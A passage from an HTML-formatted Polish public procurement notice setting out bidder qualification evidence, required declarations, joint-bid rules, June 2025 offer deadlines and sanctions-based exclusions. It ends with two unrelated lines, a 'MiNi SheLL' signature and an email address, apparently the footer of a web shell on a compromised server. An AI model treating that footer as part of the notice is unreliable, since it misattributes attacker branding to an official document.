Unii Europejskiej. Jeżeli w dniu publikacji ogłoszenia o zamówieniu w Dzienniku Urzędowym Unii Europejskiej, Narodowy Bank Polski nie publikuje średniego kursu danej waluty, za podstawę przeliczenia przyjmuje się średni kurs waluty publikowany pierwszego dnia, po dniu publikacji ogłoszenia o zamówieniu w Dzienniku Urzędowym Unii Europejskiej, w którym zostanie on opublikowany.<br/>− Zamawiający zastrzega weryfikację potwierdzenia należytego wykonania usług bezpośrednio u podmiotu, na rzecz którego były wykonane.<br/>− W przypadku usług powtarzających się lub ciągłych nadal wykonywanych należy podać wartość dostaw zrealizowanych przed upływem terminu składania ofert. Referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/>− W przypadku gdy Wykonawca wykonywał w ramach jednego kontraktu/ umowy większy zakres prac, dla potrzeb zamówienia powinien wyodrębnić i podać zakres i wartość każdego zamówienia, o którym mowa powyżej.<br/>− Jeżeli wykonawca powołuje się na doświadczenie w realizacji usług wykonywanych wspólnie z innymi wykonawcami, wykaz dotyczy usług, w których wykonaniu wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających się lub ciągłych, w których wykonywaniu bezpośrednio uczestniczył lub uczestniczy. Zamawiający zastrzega możliwość zwrócenia się do wykonawcy o wyjaśnienia w zakresie faktycznie i konkretnie wykonywanego zakresu prac oraz przedstawienia stosownych dowodów np. umowy konsorcjum, z której wynika zakres obowiązków czy wystawionych przez wykonawcę faktur. <br/><br/>3.	Warunki udziału w postępowaniu, o których mowa w Rozdziale V ust. 2 pkt 4) zostaną spełnione wyłącznie, jeżeli:<br/>a) co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia lub podmiotów udostępniających zasoby spełni warunek udziału<br/>samodzielnie albo wykonawcy wspólnie ubiegający się o udzielenie zamówienia spełnią łącznie lub podmioty udostępniające zasoby spełnią warunek udziału łącznie z Wykonawcą – w przypadkach określonych w ust. 2 pkt 4, warunek nr 1 <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2024 r.. poz. 594 ), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 4 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) Wykaz usług, na spełnienie warunku nr 1, wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy - załącznik nr 8 do SWZ;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz ofertowy (według załączonego wzoru – Załącznik nr 1 do SWZ).<br/>Wymagana forma:<br/>2) oświadczenie sankcyjne– w przypadku niniejszego postepowania oświadczenie<br/>sankcyjne jest zawarte w oświadczeniu na podstawie art. 125 ust. 1 ustawy Pzp.<br/>3) oświadczenie o podziale obowiązków w trakcie realizacji zamówienia Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia (według załączonego wzoru –<br/>Załącznik nr 5 do SWZ) - jeżeli dotyczy<br/>4) Zamawiający nie wymaga przedłożenia wraz z ofertą przedmiotowych środków<br/>dowodowych.<br/>5) Oświadczenia i/lub dokumenty na podstawie których, Zamawiający dokona oceny skuteczności zastrzeżenia informacji<br/>zawartych w ofercie, stanowiących tajemnicę przedsiębiorstwa, w rozumieniu przepisów o zwalczaniu nieuczciwej<br/>konkurencji (jeżeli Wykonawca zastrzega takie informacje) – jeżeli dotyczy;<br/>6) Pełnomocnictwo, z którego wynika prawo do podpisania oferty oraz do podpisania innych<br/>dokumentów składanych wraz z ofertą (jeżeli umocowanie osoby wskazanej w ofercie nie<br/>wynika z dokumentów rejestrowych KRS/CEIDG);<br/>7) pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>ewentualnie umowę o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo. Pełnomocnik może być<br/>ustanowiony do reprezentowania Wykonawców w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy<br/>– jeżeli dotyczy;<br/>2. Do przygotowania oferty konieczne jest posiadanie przez osobę upoważnioną do<br/>reprezentowania Wykonawcy kwalifikowanego podpisu elektronicznego/ podpisu<br/>zaufanego/ podpisu osobistego.<br/>Wymagana forma:<br/>Wymagane dokumenty muszą być złożone w pod rygorem nieważności, w formie<br/>elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem<br/>osobistym, podpisem zaufanym.<br/>3. Wszelkie informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu ustawy z dnia<br/>16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2022 r. poz. 1233), które<br/>Wykonawca zastrzeże jako tajemnicę przedsiębiorstwa, powinny zostać zapisane i<br/>przekazane w osobnym pliku oznaczonym jako „Tajemnica przedsiębiorstwa”.<br/>Powyższe, zgodnie z §4 ust. 1 rozporządzenia w sprawie użycia środków komunikacji<br/>elektronicznej stanowi warunek utrzymania ich w poufności. Jeżeli Wykonawca nie<br/>dopełni tych obowiązków, Zamawiający będzie miał podstawę do uznania, że zastrzeżenie<br/>tajemnicy przedsiębiorstwa jest bezskuteczne i w związku z tym potraktuje daną<br/>informację, jako niepodlegającą ochronie i niestanowiącą tajemnicy przedsiębiorstwa<br/>w rozumieniu uznk.<br/><br/>Zamawiający jednocześnie wyjaśnia, że Wykonawca zobowiązany jest wraz<br/>z przekazaniem tych informacji, wykazać spełnienie przesłanek określonych w art. 11 ust.<br/>2 ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji. Zaleca się, aby<br/>uzasadnienie zastrzeżenia informacji jako tajemnicy przedsiębiorstwa stanowiło również<br/>odrębny plik, umożliwiający jego udostępnienie. Zastrzeżenie przez Wykonawcę<br/>tajemnicy przedsiębiorstwa bez uzasadnienia, będzie traktowane jako bezskuteczne<br/>ze względu na zaniechanie przez Wykonawcę podjęcia niezbędnych działań w celu<br/>zachowania poufności objętych klauzulą informacji, zgodnie z postanowieniami art. 18 ust.<br/>3 ustawy.<br/>4. Wykonawca może złożyć tylko jedną ofertę.<br/>5. Treść oferty musi być zgodna z warunkami zamówienia (art. 226 ust 1 pkt 5).<br/>6. W przypadku, gdy Wykonawca dokona modyfikacji ww. wzorów formularzy, treść sporządzonej oferty, pod rygorem jej<br/>odrzucenia, musi zawierać wszystkie informacje wymagane w formularzach, o których mowa w ust. 6.<br/>7. Załącznik nr 6 SWZ - Zobowiązanie podmiotu udostępniająego zasoby jeśli dotyczy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia<br/>albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Umocowanie musi wynikać z treści pełnomocnictwa złożonego wraz z ofertą w oryginale lub w<br/>formie notarialnie potwierdzonego odpisu, podpisanego kwalifikowanym podpisem<br/>elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>2. Pełnomocnictwo o którym mowa w ust. 1 powinno zawierać w szczególności wskazanie:<br/>− postępowania o zamówienie publiczne, którego dotyczy;<br/>− wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia<br/>wymienionych z nazwy z określeniem adresu siedziby;<br/>− ustanowionego Pełnomocnika oraz zakresu jego umocowania. Zakres umocowania musi<br/>obejmować przede wszystkim: reprezentowanie Wykonawców występujących wspólnie w<br/>postępowaniu o udzielenie zamówienia publicznego, zaciąganie w ich imieniu zobowiązań,<br/>złożenie oferty wspólnie, prowadzenie korespondencji i podejmowanie zobowiązań związanych z<br/>postępowaniem o zamówienie publiczne.<br/>Dokument pełnomocnictwa musi być podpisany w imieniu wszystkich wykonawców ubiegających<br/>się wspólnie o udzielenie zamówienia, w tym pełnomocnika i przez osoby uprawnione do składania<br/>oświadczeń woli wymienione we właściwym rejestrze lub ewidencji Wykonawcy.<br/>3. Wykonawcy działający w ramach spółki cywilnej zamiast pełnomocnictwa, o którym<br/>mowa w pkt 1, mogą załączyć do oferty odpis aktualnej umowy spółki, jeżeli będzie z niej<br/>wynikać zakres umocowania wspólników.<br/>4. Wszelka korespondencja będzie prowadzona wyłącznie z pełnomocnikiem.<br/>5. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie<br/>wstępne składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie<br/>te potwierdza spełnianie warunków udziału w postępowaniu oraz brak podstaw do wykluczenia<br/>w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu oraz brak podstaw do wykluczenia.<br/>6. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania, w<br/>tym oświadczenie dotyczące przynależności lub braku przynależności do tej samej grupy<br/>kapitałowej, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>7. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, dokument na<br/>podstawie art. 125 ust. 1 ustawy Pzp składa każdy z Wykonawców wspólnie ubiegających się<br/>o zamówienie.<br/>8. W przypadku wyboru oferty Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>Zamawiający może zażądać przed zawarciem umowy w sprawie zamówienia publicznego,<br/>umowy regulującej współpracę tych Wykonawców, zgodnie z art. 59 ustawy Pzp. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z Projektowanymi Postanowieniami Umowy - załącznik SWZ&gt; <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-06-13 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma Zakupowa Zamawiającego</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-13 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-07-12</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Termin realizacji: nie wcześniej, niż od 01.08.2025 r. - okres obowiązywania umowy od pisania będzie wynosił 24 miesiące.<br/>Zamawiający informuję, iż jest to zamówienie na usługi społeczne:art. 275 pkt. 1 w związku z art. 359 pkt. 2 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych <br/>(Dz. U. z 2024 r. poz. 1320)<br/><br/>Zamawiający wykluczy Wykonawcę, jeżeli zachodzą przesłanki na podstawie art. 7 ust.1 ustawy z dnia 13 kwietnia 2022 r. o<br/>szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego (Dz.U. poz. 835), tj. Wykonawców:<br/>- wymienionych w wykazach określonych w rozporządzeniu 765/2006 i<br/>rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o<br/>zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy;<br/>- których beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz<br/>finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych w<br/>rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od<br/>dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o<br/>zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy; - których jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37<br/>ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106), jest podmiot wymieniony w<br/>wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką<br/>jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę<br/>rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy;<br/>Zamawiający informuje, że zgodnie z art. 7 ust. 6-7 ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w<br/>zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z<br/>2024 r. poz.507) osoba lub podmiot podlegające wykluczeniu na podstawie art. 7 ust. 1 tej ustawy, które w okresie tego<br/>wykluczenia ubiegają się o udzielenie zamówienia publicznego lub biorą udział w postępowaniu o udzielenie zamówienia<br/>publicznego podlegają karze pieniężnej. Karę pieniężną, o której mowa w ust. 6 tej ustawy, nakłada Prezes Urzędu<br/>Zamówień Publicznych, w drodze decyzji, w wysokości do 20 000 000 zł<br/>Ogłoszenie nr 2025/BZP 00258950/01 z dnia 2025-06-02<br/>2025-

Creat By MiNi SheLL
Email: jattceo@gmail.com